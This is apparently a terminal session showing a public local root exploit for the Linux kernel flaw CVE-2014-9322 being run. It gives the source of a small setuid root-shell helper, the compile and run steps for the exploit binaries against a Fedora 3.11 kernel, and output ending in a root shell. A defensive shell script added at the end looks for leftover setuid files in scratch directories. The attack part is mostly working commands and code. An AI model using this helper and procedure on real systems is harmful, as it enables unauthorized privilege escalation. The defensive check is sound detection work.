CVE-2014-9322
Vulnerability reference: CVE-2014-9322 (Linux kernel before 3.17.5)
The exploit is from @pi3 (Adam Zabrocki); the session below shows it being run.
[pi3@localhost clean_9322]$ cat z_shell.c
#include <stdio.h>
#include <unistd.h>   /* setuid/seteuid/setgid/setegid/execv */
int main(void) {
    char *p_arg[] = { "/bin/sh", NULL };
    /* once the binary is setuid root, switch real and effective uid/gid to root before exec */
    setuid(0);
    seteuid(0);
    setgid(0);
    setegid(0);
    execv("/bin/sh", p_arg);   /* execv takes only the path and argv */
    return 1;                  /* only reached if execv fails */
}
[pi3@localhost clean_9322]$ gcc z_shell.c -o z_shell
[pi3@localhost clean_9322]$ cp z_shell /tmp/pi3
[pi3@localhost clean_9322]$ ls -al /tmp/pi3
-rwxrwxr-x 1 pi3 pi3 8764 April 6 23:09 /tmp/pi3
[pi3@localhost clean_9322]$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
[pi3@localhost clean_9322]$ /tmp/pi3
sh-4.2$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
sh-4.2$ exit
exit
[pi3@localhost clean_9322]$ gcc -o procrop procrop.c setss.S
[pi3@localhost clean_9322]$ gcc -o p_write8 swapgs.c setss.S -lpthread
swapgs.c: In function ‘main’:
swapgs.c:175:29: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
: "r"(4), "r"((int)p_to_d), "r"(1)
^
[pi3@localhost clean_9322]$ ./procrop
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
Usage: ./procrop <number>
Number:
1 - kernel [3.11.10-301.fc20.x86_64]
[pi3@localhost clean_9322]$ ./procrop 1 &
[1] 5827
[pi3@localhost clean_9322]$
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
[+] Using kernel target: 3.11.10-301.fc20.x86_64
[pi3@localhost clean_9322]$
[pi3@localhost clean_9322]$
[pi3@localhost clean_9322]$ ps aux |grep procr
pi3 5827 83.0 0.0 4304 320 pts/1 RL 23:12 0:05 ./procrop 1
pi3 5829 0.0 0.1 112660 916 pts/1 S+ 23:12 0:00 grep --color=auto procr
[pi3@localhost clean_9322]$ ./p_write8
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
Usage: ./p_write8 <number>
Number:
1 - kernel [3.11.10-301.fc20.x86_64]
[pi3@localhost clean_9322]$
[pi3@localhost clean_9322]$ ./p_write8 1
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
[+] Using kernel target: 3.11.10-301.fc20.x86_64
[+] mmap() memory in first 2GB of address space... DONE!
[+] Preparing kernel structures... DONE! (ovbuf at 0x602140)
[+] Creating LDT for this process... DONE!
[+] Press enter to start fun-game...
[exploit] pthread runningAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[1]+ Done ./procrop 1
Segmentation fault (core dumped)
[pi3@localhost clean_9322]$ ls -al /tmp/pi3
-rwsrwsrwx 1 root root 8764 April 6 23:09 /tmp/pi3
[pi3@localhost clean_9322]$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
[pi3@localhost clean_9322]$ /tmp/pi3
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),1000(pi3)
sh-4.2# exit
exit
[pi3@localhost clean_9322]$
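A defender's check for the artifact the run above leaves behind (/tmp/pi3 turned into a root-owned, world-writable setuid/setgid file), added here as an example; it is not part of the original transcript or of the pi3 exploit, and the function names and the list of scratch directories are assumptions.

```sh
#!/bin/sh
# Added defensive check (not from the original session or the exploit):
# a successful run of p_write8 leaves /tmp/pi3 as "-rwsrwsrwx 1 root root",
# i.e. a root-owned setuid/setgid file that is also world-writable. No
# legitimate setuid binary is ever world-writable, and none lives in /tmp,
# so either condition is a post-exploitation indicator regardless of which
# kernel bug produced it.

# Print every regular file under DIR that has the setuid or setgid bit set
# and is world-writable. "-perm -4002" means the setuid bit AND the
# other-write bit are both set; "-perm -2002" is the same for setgid.
find_writable_setid() {
    dir="$1"
    find "$dir" -xdev -type f \( -perm -4002 -o -perm -2002 \) -print 2>/dev/null
}

# Print every root-owned setuid file directly inside a scratch directory
# such as /tmp (mode 1777). Privileged binaries belong in /usr/bin, not in
# directories that any local user can write to.
find_setuid_root_in_scratch() {
    dir="$1"
    find "$dir" -maxdepth 1 -type f -perm -4000 -user root -print 2>/dev/null
}

# Audit the usual scratch directories (assumed list) and print an ls -l line
# for each hit. Returns 1 when anything was found so it can alert from cron.
audit_scratch_dirs() {
    hits=$(for d in /tmp /var/tmp /dev/shm; do
               [ -d "$d" ] && { find_writable_setid "$d"; find_setuid_root_in_scratch "$d"; }
           done | sort -u)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits" | while IFS= read -r f; do ls -ld "$f"; done
    return 1
}
```

Source the file and call `audit_scratch_dirs`; a nonzero exit status means at least one suspicious file was listed.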